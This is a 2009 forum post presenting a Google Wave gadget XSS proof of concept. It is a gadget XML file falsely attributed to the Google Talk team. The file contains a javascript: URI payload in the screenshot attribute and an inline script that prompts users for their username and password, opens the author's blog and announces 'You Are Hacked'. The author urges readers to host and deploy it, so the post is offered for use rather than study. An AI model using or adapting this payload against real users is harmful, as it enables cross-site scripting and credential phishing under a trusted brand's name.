google wave XSS
Date: December 05, 2009 06:11AM
i have google wave account & trying to develop some gadgets .....
with xml file google gadget support javascript..!!
so we can do many booom with this features...!!
just try
<Module>
<ModulePrefs title="Google Talk" description="See your contacts and send instant messages." author="Google Talk Team" author_affiliation="Google, Inc." author_location="Kirkland, WA" screenshot="javascript:alert(/XSS! document.domain=/.source+document.domain)" thumbnail="http://talkgadget.google.com/talkgadget/googletalk-thm.png" category="communication" category2="tools" height="451" render_inline="optional">
<Locale lang="en" country="us"/>
</ModulePrefs>
<Content type="html">
<![CDATA[
<script type="text/javascript">
var uname=prompt("Enter Your Username");
var pass=prompt("Enter Your Password");
window.open("http://jaiminbhagat.wordpress.com");
alert("You Are Hacked By Ejoker....Muhahahahha");
</script>
]]>
</Content>
</Module>
copy this & save as .xml file
& upload to any free hosting site...!!
add that url to google wave gadgets...!!
you can do lot more things with feature...!!
if havnt wave ID request me here or on my blog...!!
http://jaiminbhagat.wordpress.com